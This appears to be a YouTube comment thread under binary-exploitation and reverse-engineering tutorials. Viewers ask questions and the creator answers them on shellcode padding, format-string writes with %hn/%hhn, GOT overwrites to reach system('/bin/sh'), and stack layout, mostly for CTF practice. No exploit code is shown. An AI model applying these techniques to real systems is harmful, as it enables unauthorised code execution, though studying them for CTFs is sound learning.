I love your way of explaining things, I've been checking several sources for this stuff and so far this is the best for my way of thinking. GG
@ppipn5695 күн бұрын
how do you know this 216f is format specify?
@RazviOverflow4 күн бұрын
What do you mean?
@ARINAGRAWAL-cg2be8 күн бұрын
Thank you so much, was stressing and struggling with this implementation and library inclusion. Success with Visual Studio 2022👍
@RazviOverflow7 күн бұрын
You are welcome, glad I could help :)
@davidmohan26989 күн бұрын
Why do you minus shellcode? why do you not add them all together like in the previous videos?
@RazviOverflow9 күн бұрын
I'm not doing -shellcode, I'm doing - len(shellcode). That's because I want to pad with A's 0x50 minus the bytes of the shellcode, and I don't want to manually count them. So I use 0x50 - len(shellcode)
@davidmohan26989 күн бұрын
@@RazviOverflow Oh ok what is the purpose of subtracting 0x50 from the length of the shellcode ?
@davidmohan26989 күн бұрын
ignore me I think I figured it out.
@RazviOverflow7 күн бұрын
@@davidmohan2698 No worries at all. If you still have any doubt ask me, I'll do my best to clarify it.
@royweiss113 күн бұрын
Thanks A LOT!!!
@RazviOverflow12 күн бұрын
You are welcome
@katchen262617 күн бұрын
Man these are great! Please make more.
@RazviOverflow16 күн бұрын
Thank you :)
@RazviOverflow17 күн бұрын
If anyone wonders how to configure Cutter to look like the instance you see in the video, I have prepared a step-by-step configuration video: kzbin.info/www/bejne/sKO7cmZ3eMRpa5o Hope this helps!
@_vox518918 күн бұрын
polino mi manchi
@user-eh1vi3jz1c18 күн бұрын
You know what u doing hehe
@RazviOverflow18 күн бұрын
I wish -.-'
@HoneyBravoLui20 күн бұрын
Ciao POLIMI
@Fiona-hs2ys23 күн бұрын
Hi what like debugger do you use?
@RazviOverflow22 күн бұрын
Hello. I'm using Cutter. Here's a video of its configuration: kzbin.info/www/bejne/sKO7cmZ3eMRpa5o
@Fiona-hs2ys22 күн бұрын
@@RazviOverflow 🙏 Thank you! And you videos are great I am finally understanding binary ex/rev!😀
@RazviOverflow22 күн бұрын
@@Fiona-hs2ys Glad to help!
@RazviOverflow20 күн бұрын
@@Fiona-hs2ys Glad to help. There's no money that can buy the feeling of progress, specially in the field of rev/pwn! :)
@ragnarlothbrok367Ай бұрын
i dont understand a shit from all of this, i don't know what is the flow or next instruction when you talk about things, i don't see the context
@RazviOverflowАй бұрын
You are the first one (so far) pointing out the context is missing. Please tell me why and how the video could be improved.
@ragnarlothbrok367Ай бұрын
@@RazviOverflow Just look at the illustration at 12:30, it may be not even your fault, just assembly is ... insane, everything goes everywhere all the time and i fail to map this in my brain
@RazviOverflowАй бұрын
@@ragnarlothbrok367 Ok, then the problem is not the video. Have you tried watching easier videos?
@richardnelson8121Ай бұрын
Promo SM 😜
@user-pg9te8ug1jАй бұрын
Wow - this is by far the best explanation if seen on the topic so far. Thank you very much!
@RazviOverflowАй бұрын
Glad you liked the video :)
@lincoln9521Ай бұрын
Hello Razvi! Thank you very much for your videos, the explanations are very clear, thanks again 😁
@RazviOverflowАй бұрын
You are more than welcome. I'm happy you like my videos and they help in any way :)
@mihailobabic7366Ай бұрын
Thanks!
@RazviOverflowАй бұрын
I'm happy you liked the video :) And thank you very much for the super!
@m1zo51Ай бұрын
Did everything in the video unfortunately it did not work.. I was still getting error about visual studio not being able to find header files the only fix for me was installing it via vcpkg
@rgb123-jm5mcАй бұрын
Bro thank you man
@RazviOverflowАй бұрын
You are welcome
@perseusz1691Ай бұрын
Thank you very much! It works for me in Visual Studio Code 2022.
@RazviOverflowАй бұрын
You are welcome :)
@kinezi7898Ай бұрын
Can you edit the video with visual studio 2022? I get many errors.
@RazviOverflowАй бұрын
I don't think I will... Why don't you try using VS2019?
@kinezi7898Ай бұрын
@@RazviOverflow It's done, thank you. Is it also valid for Cryptlib and not for others, for example, when I look on the internet, they import the Cryptopp library. Can you post videos for others? Again, health to your hands, labor and mouth. You are a life saver <3
@RazviOverflowАй бұрын
@@kinezi7898 I don't think I will record videos on this topic, but I will sure do in the areas of binary exploitation and reverse engineering. Glad my video helped you. Cheers :)
@kinezi7898Ай бұрын
@@RazviOverflow Can I ask two more questions? I've been trying to download OpenSSL lately and I'm getting errors, maybe it's because of what the guy did or maybe it's outdated because I'm typing exactly what he said in the terminal. Can you make a separate openssl installation video? Also, you made the Cryptlib library in this video, can you make others like Cryptopp Cryptest?
@user-kb8bc9eu4r2 ай бұрын
The chef is back to cook 🔥, could u start with heap exploitation also your series is the best for pwn in youtube
@RazviOverflow2 ай бұрын
Hi there! I will consider getting into heap exploitation once I'm done with all the stack stuff I got in mind :) Thank you
@cozt70502 ай бұрын
legend is back
@RazviOverflow2 ай бұрын
🫂
@incursio11222 ай бұрын
Thanks a lot for this, really needed this, was really confused when I was watching your pwn101 series and my disassembly code had variables relative to stack and not rbp, thanks a lot for this video sir.
@RazviOverflow2 ай бұрын
Glad it helped, that's the main purpose of my videos :)
@abhinavbansal-cc8gr2 ай бұрын
we need more videos from you.......why did u stop mnaking them??
@RazviOverflow2 ай бұрын
I did not stop, nor do I plan to stop... only that making videos takes some time. Time that I do not always have. Thank you for your support :)
@theviralhub2452 ай бұрын
Wow Razvi. Soo glad you posted this video! Do you have plans to go down the reverse engineering route of videos? Or are you going to continue down the path of more complex exploitation techniques? Either way, I’m all here for it!
@RazviOverflow2 ай бұрын
Regarding reversing, it's something that has been on my mind for some time now. If so, what would you like to see?
@theviralhub2452 ай бұрын
@@RazviOverflow awesome. I’d like to see how you would approach reversing both Linux and PE files and how you would translate the assembly instructions back to C pseudo code to understand overall program logic. Maybe also do some Windows Keygen challenges where you write Key generators for various executables. I’m sure many others like myself would like to improve their overall reversing skills so a clear cut methodology on how to approach different challenges would be really cool to see and learn from. Thanks Razvi.
@RazviOverflow2 ай бұрын
@@theviralhub245 Thank you for your ideas, I'll definitely give it a thought. Although I cannot promise any specific video (at least in the short team), there is nevertheless a video I'd like to do anytime soon, reversing related.
@theviralhub2452 ай бұрын
@@RazviOverflow sure. at the end of the day the video choice is all yours. Make do with it as you please and please take your time. 🙏🏾💯. This is top tier content
@RazviOverflow2 ай бұрын
@@theviralhub245 Thank you for your support :)
@marcovalentinoalvarado32902 ай бұрын
Ooooff new video ❤🔥 Yesterday by the morning I did all the pwn101 series with your videos on the side and I was thinking about you and wondering about your next video, and here it is! Thanks for sharing men!
@RazviOverflow2 ай бұрын
You are welcome :) I'm happy my videos helped you
@ELFx862 ай бұрын
Thanks !!!!
@RazviOverflow2 ай бұрын
You are welcome :)
@marcovalentinoalvarado32902 ай бұрын
Each video goes up in quality, thank you so much for sharing!
@RazviOverflow2 ай бұрын
You are welcome, thank you :)
@samthelamb07182 ай бұрын
what do you do if you need to write a larger value, what would you do if you needed to split the write three times? im doing a ctf and it requires me to overwrite a variable with a very large value because whenever i try to pad it with to be eight byte aligned two it just EOFs right off the bat.
@RazviOverflow2 ай бұрын
You can split the write using %hn, which will write just 2 bytes. Or even %hhn, which will write just one. Regarding the values, just consider the bytes you have to write. Imagine you have printed so far 0xDEAD bytes, and you are using %hhn so write into any address. It will write just the 'AD'. If you need to write a lower value, just "overvflow" the sum, like 0xDF01 will wite only the '01'.
@samthelamb07182 ай бұрын
yeah, thanks i didnt know that, i'm overwriting the got with a libc address because puts is called right after format string vuln with /bin/sh as argument meaning if i get the system address in got where puts is i will get a shell, simple right, the address is a 48 bit value rather than a 32 bit, what should i do if its a 48 bit value, because im running into troubles getting that into got address. is there a way to debug these exploits? @@RazviOverflow
@rhyswong67792 ай бұрын
Sorry as I am kind of new to using Cutter, but when I use Cutter on my end my theory is that it somehow adds the 0x8 of the ebp to the variable? So instead of it being 0x20 like in the video its 0x28. I say this become my exploit dosen't work if I add the extra padding for the 8 bytes on top of 0x28
@RazviOverflow2 ай бұрын
Hello, take a look at this question: reverseengineering.stackexchange.com/questions/32317/cutter-shows-addresses-relative-to-stack-but-not-rbp-how-to-change-it
@kam76212 ай бұрын
Hi, great write up! One question - how do you enable additional descriptions next to each line in cutter in Graph view, for example mov eax, 0 ; moves data from src to dst
@RazviOverflow2 ай бұрын
By enabling the debugging settings of Cutter. There are several checks you can enable/disable, and one of them is adding comments next to each instruction.
@incursio11222 ай бұрын
You are god🙏🙏
@RazviOverflow2 ай бұрын
Glad to help :)
@shichimenchoo3 ай бұрын
Cool video, thanks a lot
@RazviOverflow3 ай бұрын
You are welcome :)
@Ikd19qqw3 ай бұрын
bro i can't get it how you take a shell without using shellcode? or that because of using 'interactive' func?
@RazviOverflow3 ай бұрын
No, the "interactive" function from pwntool just pipes the stdin to the stdout of the process, so I can interact with it. Hence its name. Around 5:15 lies the vulnerability and its corresponding explanation, that's how and why you get a shell.
@samthelamb07183 ай бұрын
sorry for the noob question but how do you get cutter to look so good with the comments and theme and all those convenient looking features
@RazviOverflow3 ай бұрын
I think I've mentioned it in another video, not sure... You just have to "enable" several of its debugging options. They are pretty easy to spot if you try to configure your Cutter instance.
@rhyswong67792 ай бұрын
I was wondering the same as well, especially the variables arent highlighted which makes them a little bit harder to spot@@RazviOverflow
@shlomighty3 ай бұрын
Life saver. thank you so much!
@RazviOverflow3 ай бұрын
Glad to help!
@r3plican3 ай бұрын
why we must put 0xc0d3 first, why not instead 0xc0ff33 first?
@RazviOverflow3 ай бұрын
Around 7:50 lies the explanation, it is because writing into memory happens from lower towards higher memory addresses, whereas the stack grows from higher towards lower addresses. Writing into memory happens in the fashion of: rbp-0x70, rbp-0x6F, rbp-0x6E, rbp-0x6D, and so on... so you are first overwriting rbp-0x8 and then rbp-0x4.
@N0RT0X4 ай бұрын
Mil gracias por esta serie. Eternamente agradecido
@RazviOverflow4 ай бұрын
Me alegro de que te sea útil :)
@regas64414 ай бұрын
Thanks for the explanation on the MOVAPS issue, been getting it and didn't really understand what was going on.
@RazviOverflow4 ай бұрын
You are most welcome :)
@regas64414 ай бұрын
Excellent content, this actually helped me a lot. Please keep posting!
@RazviOverflow4 ай бұрын
Glad it helped!
@MHg2NjcyNmY3OTY04 ай бұрын
Very useful
@Error-NoContextFound4 ай бұрын
Not me looking for the script to do so 😗
@RazviOverflow3 ай бұрын
Don't cheat, learn the concepts :)
@user-ng9uv3hs3k5 ай бұрын
This is seriously the best explanation i've found on ROP. The explanation is so clear and detailed. So helpful 😄 Loved it!
@RazviOverflow5 ай бұрын
I'm happy it helped you :)
@davidedg805 ай бұрын
Life saver! All the required steps clearly described! I was struggling with the MTd Mdd options as I was not even aware of what they are...! Thx!!
@RazviOverflow5 ай бұрын
Glad it helped :) You are more than welcome
@OliLabVideo5 ай бұрын
thanx, that helped !
@sameerpurwar5 ай бұрын
in the above case is the libc library loaded at the startup or when the puts function is called the linker loads the entire libc library into the memory and the resolves the symbol ??
@RazviOverflow5 ай бұрын
I recommend you reading about "lazy binding" syst3mfailure.io/ret2dl_resolve/
@krimenet43765 ай бұрын
bro! Thank you very much. I've tried package managers and others, and this is the first video I come across that works for me and compiles without any errors. Thank you very much, you've earned my subscription. Thank you!!!
@RazviOverflow5 ай бұрын
Glad to help :) You are welcome
@samratgupta7315 ай бұрын
What if I want to edit the values that are placed lower on memory, is there a way to underflow or something?
@RazviOverflow5 ай бұрын
No, because writing into memory always happens from lower towards higher addresses.
@davidshipman59645 ай бұрын
Great video! I learned a lot. It is crazy that you can do things like this lol